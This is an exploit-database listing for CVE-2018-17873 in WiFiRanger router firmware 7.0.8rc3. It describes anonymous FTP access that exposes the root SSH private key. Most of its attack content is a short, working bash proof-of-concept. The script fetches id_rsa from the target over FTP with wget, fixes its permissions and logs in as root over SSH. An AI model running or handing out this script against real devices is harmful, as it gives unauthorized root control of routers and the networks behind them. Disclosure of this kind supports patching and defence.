[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WiFiRanger 7.0.8rc3 Incorrect Access Control / Privilege Escalation Vulnerability

Author
Mitchel Jordan
Risk
[
Security Risk High
]
0day-ID
0day-ID-31370
Category
local exploits
Date add
21-10-2018
CVE
CVE-2018-17873
Platform
hardware
# Exploit Title: WiFiRanger 7.0.8rc3 Incorrect Access Control - Privilege Escalation (POC)
# Exploit Author: Mitchel Jordan
# Vendor Homepage: https://wifiranger.com/
# Firmware: Phantom 7.0.8rc3
# CVE: CVE-2018-17873

# Details:
# WiFiRanger indoor routers (Core, GoAC) and their outdoor paired routers (Sky Pro, EliteAC, EliteAC FM) running 
# firmware version 7.0.8rc3 and earlier allow anonymous FTP read/write access and have left the SSH Private Key
# in the clear - making it a trivial task to view/copy the key and log in with root privileges.
#
# Adjacent network access required to exploit this vulnerability.

# Exploit:
# Extremely simple shell script that grabs the private key and logs in as root.
#
# Usage: ./wifiRangerPwn.sh <WiFiRanger IP>

#!/bin/bash

wget "ftp://$1/sbc/aff/id_rsa"
chmod 600 id_rsa
ssh -i id_rsa root@$1

#  0day.today [2024-12-25]  #